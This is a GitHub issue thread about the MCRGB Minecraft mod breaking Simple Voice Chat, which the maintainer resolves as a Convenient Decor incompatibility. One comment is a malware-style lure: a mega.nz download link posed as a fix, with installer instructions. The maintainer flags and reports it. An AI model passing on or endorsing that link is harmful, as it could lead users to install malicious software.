### ISSUE TITLE
MCRGB installed it makes SVC return not connected

### ISSUE THREAD

**Issue by NFLD99** [bacco-bacco/MCRGB#8] opened 2024-08-25 11:08 UTC
SVC Admin: `mcrgb has an error in fabrics join event which causes it to break for other mods, please report this issue to them with this log line`
https://mclo.gs/N99j4OZ#L20981

Logs: 
[MCRGB Disabled.log](https://github.com/user-attachments/files/16739915/MCRGB.Disabled.log)
[MCRGB Enabled.log](https://github.com/user-attachments/files/16739916/MCRGB.Enabled.log)

Pack Used: https://www.curseforge.com/minecraft/modpacks/fluffcraft [Fluffcraft 1.1.25] {1.1.26 will remove MCRGB until its fixed}

**Comment by esttemanb** [comment] 2024-08-25 11:48
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by bacco-bacco** [comment] 2024-08-25 12:25
Hi, I will look into this issue soon when I get a chance. I deleted and reported that reply as it looks like malware.

**Comment by NFLD99** [comment] 2024-08-25 14:47
> Hi, I will look into this issue soon when I get a chance. I deleted and reported that reply as it looks like malware.

thank you, sounds good i did test with just MCRGB and SVC and it was fine but when in the pack there having MCRGB kills SVC and the SVC Adminds told me to report that line to you

**Comment by bacco-bacco** [comment] 2024-09-14 12:21
Can you try updating Convenient Decor to version 0.4.3?

There seems to be an issue with Convenient Decor that was breaking MCRGB, which then caused the issue with SVC. 

However, this seems to be fixed in Convenient Decor 0.4.3

**Comment by bacco-bacco** [comment] 2024-09-15 13:46
It appears this was being caused by an incompatibility with how Convenient Decor was handling biome colours for it's custom leaf blocks. 
**The developer of Convenient Decor has fixed this issue in version 0.4.3**

It was causing MCRGB to throw an uncaught exception which was interrupting other mods, such as SVC, from using the `ClientPlayConnectionEvents.JOIN` event.

This specific conflict has been resolved with Convenient Decor version 0.4.3, however I am working on a fix to prevent future conflicts from breaking mods which use `ClientPlayConnectionEvents.JOIN`.

**Comment by bacco-bacco** [comment] 2024-12-16 22:18
> It appears this was being caused by an incompatibility with how Convenient Decor was handling biome colours for it's custom leaf blocks. **The developer of Convenient Decor has fixed this issue in version 0.4.3**
> 
> It was causing MCRGB to throw an uncaught exception which was interrupting other mods, such as SVC, from using the `ClientPlayConnectionEvents.JOIN` event.
> 
> This specific conflict has been resolved with Convenient Decor version 0.4.3, however I am working on a fix to prevent future conflicts from breaking mods which use `ClientPlayConnectionEvents.JOIN`.

As of v0.2.7, MCRGB now throws an exception if this occurs.
While the specific conflict with Convenient Decor is now fixed, if it were to reoccur with a different mod, it should now throw a warning in the logs and continue as normal, and not cause further issues (like killing SVC).

**Closed by bacco-bacco** 2024-12-16 22:18 UTC
